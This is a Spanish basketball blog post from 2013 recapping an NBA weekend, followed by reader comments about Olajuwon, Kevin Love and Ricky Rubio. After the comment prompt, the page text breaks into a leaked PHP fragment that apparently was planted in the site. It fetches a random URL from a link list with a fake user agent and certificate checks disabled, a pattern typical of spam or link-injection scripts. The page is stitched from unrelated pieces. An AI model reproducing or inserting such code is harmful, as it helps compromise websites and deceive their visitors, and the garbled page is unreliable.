Informe del fin de semana: Vuelven los avispones

23 de December de 2013 por txusma

Repasamos lo que ha dado de sí uno de los fines de semanas más activos del curso en nuestro blog.

Últimamente, día que declaramos como de de escaso interés, día de baloncesto del bueno. Destacábamos en la previa del fin de semana el Indiana-Houston y resulta que terminó siendo uno de los partidos menos atractivos por lo pronto que se decidió el choque.

“Los Pacers se resarcieron de la derrota ante Miami dándole una soberana tunda a los Rockets en el debut de Granger.” Denise.

Sí acertamos, en cambio, recomendando el Suns@Nuggets…

“En el segundo cuarto (los Suns) iban palmando de 20 puntos. En el último, les han pasado por encima a los Nuggets con la dupla de hermanos saliéndose y un Dragic que es un auténtico puñal cuando se trata de ganar un partido” Rumbero.

Y también el Wolves@Lakers y el Bobcats@Pistons donde pudimos ver a dos de los máximos protagonistas del día.

Espectacular momento de forma para un tipo como Kemba Walker que lo tenemos bastante olvidado, 24’5 puntos, 4’2 rebotes y 4’6 asistencias con grandes % de tiro en los últimos 5 partidos. Los Pistons volvieron a mostrar su cara fea y perdieron el encuentro en el último cuarto con un parcial de 41-17 en su contra, tras llegar 12 arriba al final del tercer cuarto.(…) Gran partido, esta vez sí, de Gasol con 21-13-8, bien acompañado por Meeks, Young y Henry para doblegar a unos decepcionantes Wolves” Denise. 

El otro protagonista fue Kyrie Irving con una auténtica exhibición que a punto estuvo de quedarse en nada ante unos (extrañamente) combativos Bucks.

“Quien si se llenó de puntos es Irving, y este año nos tiene acostumbrados a partidos despampanantes y a partidos pésimos.” Esteban.

Del resto del viernes, como comentábais, muy emocionantes tanto la derrota de Nets en Philadelphia, con un buzzer-beater algo dudoso de Evan Turner (¿falta en ataque?) como de los Mavs en casa ante los Raptors a pesar del gran partido de Calderon y con un DeRozan en estado de gracia. Los Hawks arrasaron a los Jazz y del Kings@Heat sólo se pudo rescatar el brutal mate de LeBron sobre McLemore.

Poco rato después pudimos volver a ver a los Knicks naufragar miserablemente, esta vez ante unos grises Grizzlies. Ahora mismo debe de resultar complicado para un parroquiano del Madison encontrar motivación para asistir cada día a los partidos.El sábado, casi en tiempo real, Ruxixón se adelantaba a varios contertulios para informarnos de otra mala noticia: “Acaban de decir que Brook Lopez será baja toda la temporada por una fractura en su pie.”

En los partidos destacados del día, los Spurs no lograron detener a los Thunder con un Westbrook desatado y Howard se dió un auténtico festín ante Drummond lo que completó un duro fin de semana para los Pistons.

“Que gran temporada de OKC. Esperaba un equipo corto, previsible y con pocos recursos en ataque, pero por fin Brooks le ha dado minutos a los mas jovenes y ayer vencieron a SAS con un gran Westbrook y una maginifica aportacion del banquillo en un mal partido de Durant para lo que nos tiene acostumbrado.

Cómo se motivó DH ante Drummond para acabar comiendose al de Detroit. 35-19 con 9 de 14 en libres para Superman, que esta vez si hizo de jugador franquicia tirando del equipo en ausencia de HardenEn el debe de Brooks, me gustaría ver mas a Perry Jones y ya podría ir dandole minutos, que con confianza estoy seguro de que sería un jugador muy util.

Y Cheeks que no da con la tecla en una temporada llena de contrastes para los de Michigan.” Denise.

Impresionante exhibición de triples tanto por parte de Suns ante Mavericks (15) como de Magic ante Kings (12) aunque a estos no les sirviera para ganar.  Importantes victorias de Clippers, sin despeinarse ante Nuggets, y de Portland, sufriendo ante Pelicans, con otra gran actuación de Lillard. Los Warriors doblegaron a unos Lakers desolados por tanta ausencia (Gasol enfermo, lo que les faltaba) pero no les sirve para acercarse a la zona noble. Por su parte, los Celtics se dejaron levantar una renta de 18 puntos ante unos Wizards en ascenso y decepcionaron Bobcats (ante Jazz), Cavs (en Chicago) y Sixers (en Milwaukee). Por si nadie se ha percatado todos tienen en común la conferencia a la que pertenecen. Al menos en Charlotte pudieron darse la alegría de anunciar la vuelta del nombre de Hornets y de su logo, para muchos, tan molón.

Y ayer noche, exhibición histórica (una más) de un jugador llamado Kevin Love. Desde 1996, cuando lo consiguió Hakeem Olajuwon, ningún otro jugador ha conseguido al menos 45 puntos, 9 rebotes y 6 asistencias. De hecho, solo Bob McAdoo lo ha conseguido en alguna otra ocasión. Lo más exasperante es que semejante exhibición no sirvió para que los Wolves se llevaran la victoria del Staples Center. Y eso que a falta de 18 segundos ganaban de 4 puntos, pero una pérdida terrible de Kevin Martin permitió a los Clippers forzar la prórroga y llevarse finalmente el partido.

Más increible fue lo que pasó en Oklahoma City. Los Thunder perdieron su primer partido en casa ante los… ¡Raptors! Los canadienses llegaron al final de la primera parte por delante pero en el tercer cuarto los locales le dieron la vuelta al marcador y llegaron al principio del último cuarto 9 puntos por delante. Ni el guionista más imaginativo del mundo podía pensar que en el último cuarto Toronto sería capaz de anotar 15 puntos más que sus rivales e imponerse. Fin a la racha de 13 partidos seguidos ganando en casa.

En el último partido de la jornada paliza de Indiana a Boston. Si los Pacers eran fuertes, con Granger ya ni os contamos…

Comenta

4 comentarios a esta entrada

  1. Simon dice:
    #1

    Siempre, absolutamente siempre que alguien bate o iguala marcas históricas de combinación de puntos, rebotes y asistencias e incluso tapones siempre aparece el nombre de Hakeem Olajuwon… Enorme “The Dream” o como lo llamaba Andrés Montes “el bailarín de claqué del Cotton Club”.

      Citar

  2. rumbero dice:
    #2

    Simon:
    Siempre, absolutamente siempre que alguien bate o iguala marcas históricas de combinación de puntos, rebotes y asistencias e incluso tapones siempre aparece el nombre de Hakeem Olajuwon…Enorme “The Dream” o como lo llamaba Andrés Montes “el bailarín de claqué del Cotton Club”.

    Yo siempre digo que Olajuwon es lo mejor que he visto nunca cuando se habla de Big Men. Un prodigio ofensivo que luego era una jodida pesadilla en defensa. No hace mucho hablábamos que si ahora hay mucho buen equipo con Big Threes y tal, pero es que este ganó dos anillos en una época donde en su posición había gente como Robinson, Ewing y un joven Shaq, en una conferencia oeste donde tenías que ventilarte a los Suns de Barkley o a los Jazz de Stockton-Malone, todo esto con equipos que no eran para tirar cohetes. Drexler le echó una mano en el segundo anillo, pero sino los otros nombres que salen son los de Maxwell y eso sí, el legend de Horry.

    Y lo de los Wolves pues es de traca. Que Love y Pekovic hagan semejante salvajada para acabar palmando por pardillos tiene que doler. No defienden casi nada, Martin y Brewer ya no están tocados por la varita de inicios de temporada y Rubio tiene un problema de los gordos. Soy del club de los defensores de Ricky pero esos % de tiro están pudiendo con él. Ya no son los 0 puntos de ayer, es que prácticamente no arriesga, no mira aro y se comvierte todo en mucho más previsible.

      Citar

  3. Denise dice:
    #3

    rumbero: y Rubio tiene un problema de los gordos. Soy del club de los defensores de Ricky pero esos % de tiro están pudiendo con él. Ya no son los 0 puntos de ayer, es que prácticamente no arriesga, no mira aro y se comvierte todo en mucho más previsible.

    Su primera temporada es muy buena, la segunda un pelín peor pero con la excusa de que al principio se estaba recuperando de la lesión, y ésta tercera es nefasta. Porque aun tiene contrato rookie, si no, lo estaría poniendo ya en el mercado.

    Esta noche he soñado que los Magic le daban hoy una paliza a los Knicks y Woodson era destituido. Ahí lo dejo. xD

      Citar

  4. Esteban dice:
    #4

    la temporada de ricky no es tan mala, si lo es dadas la expectativas que todos tienen de el y el gran apoyo que recibe por ejemplo de este blog

    hoy por hoy es un base normal, ni para echarlo ni para pedir all-star, ni para nombrarlo a la altura de love ni de pekovic como trio, cosa que se ha hecho

    puede ser un base titular de la liga pero no mucho mas, incluso creo que Calderon siempre fue un jugador mas legitimo que el

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>